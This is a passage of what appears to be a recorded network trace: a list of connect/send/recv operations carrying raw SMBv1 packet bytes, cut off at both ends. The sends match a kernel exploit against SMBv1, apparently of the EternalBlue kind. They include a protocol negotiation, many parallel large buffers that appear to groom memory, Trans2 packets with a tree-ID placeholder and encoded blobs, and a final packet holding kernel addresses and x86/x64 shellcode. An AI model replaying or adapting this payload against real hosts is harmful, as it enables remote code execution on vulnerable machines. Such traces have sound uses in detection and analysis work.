3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('send', 16, b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00,\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf8\\\\x87\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('close', 2, 0.0)\", \"('connect', 17, 0.0)\", \"('send', 17, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 18, 0.0)\", \"('connect', 19, 0.0)\", \"('send', 18, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 20, 0.0)\", \"('send', 19, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 21, 0.0)\", \"('send', 20, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 21, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 16, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xf3\\\\x00\\\\x00\\\\x00\\\\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\\\\x80\\\\x00\\\\xa8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00 \\\\xf0\\\\xdf\\\\xff\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\xef\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x18\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xff\\\\xcf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x009\\\\xbbfd4d9L7LS8S9B/wrEIUITZWAQeOPEtmB9vuq8KgrAP3loQnkmQdvP0QF9j8CIF9EdmNK3KEnH2CBme0Xxbx/WOOCBCDPvvjJYvcvf95egcjZ+dWquiACPOkTFW3JS6M+sLa/pa6uVzjjWOIeBX+V3Pu12C9PjUWOoRfFOAX+SFzVJL4ugpzxsVRvgFvIgqXupq+y6bfWsK90pWeE5qzBSTKcSepm0GPGr/rJg0hJn4aVBbsdnXxM2ZCDorVUsFUsF9vXC2UIJlsx5yEdThqQ5MoEd6tRwRSfYA87dvMJrPfpB8qLIaFHNX684tJJn30Bx0vnkLW3oRcGKuBqZdJ/PI4yIm++QVKkBLVa106S2gpwejplTs510cW0VN+8yVJAuZhPZSij7FLlAE4zS0bjSo6lP098nSduB9h9eziOeLhd1KG16h+g8xP2CV1VsNhr9ao+2cmCeiHYhbceDilST+ASGztHMWarFIlJUL6qlCrptzEJTk+er2j7SfHHT0nNtEa4+JRvPq5C21Kd1pcQ7vKlvZ5flQs1vvXTGZhYZKTv5lrdWNEtVEzGh+KvTFJxqKz5LNvLPT/0yRqcO6deL/nmv3UCt+B0Ut2X6cNonJG76Ut78wcRv4YP2MwApDS9fSz2AGGVxm246qiUiKWWtM6w40aDjuPH7gCQEoDHwhJgvLgmSaibPwjJrDzO0hMGDrp6SxwIFNS1G2oAPcvOn4CL4JDuLCBs08NtDrQysl0WMgCIBM+1O5D8Lue0J0359/4fCzqNCvBoqgyss9YWZb6wy6C/Kz4ak/Qmt74uXsA71fduIs3zEs6CAPpQQlvXMlZYWczpenAS2b+gO6aHHEFZBJmJ6Vy9I4RoLIPH/8Ig1ManJzkgPODvGvcuE/WUDFmiIiwGMlFMFTchBTVUQSPaLFWMUk6FqeO1LTY2/Rc3lSWSuBVeAAtlUNa6kfXqh/9==', 0.0)\", \"('recv', 1, 0.0)\", '(\\'send\\', 3, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 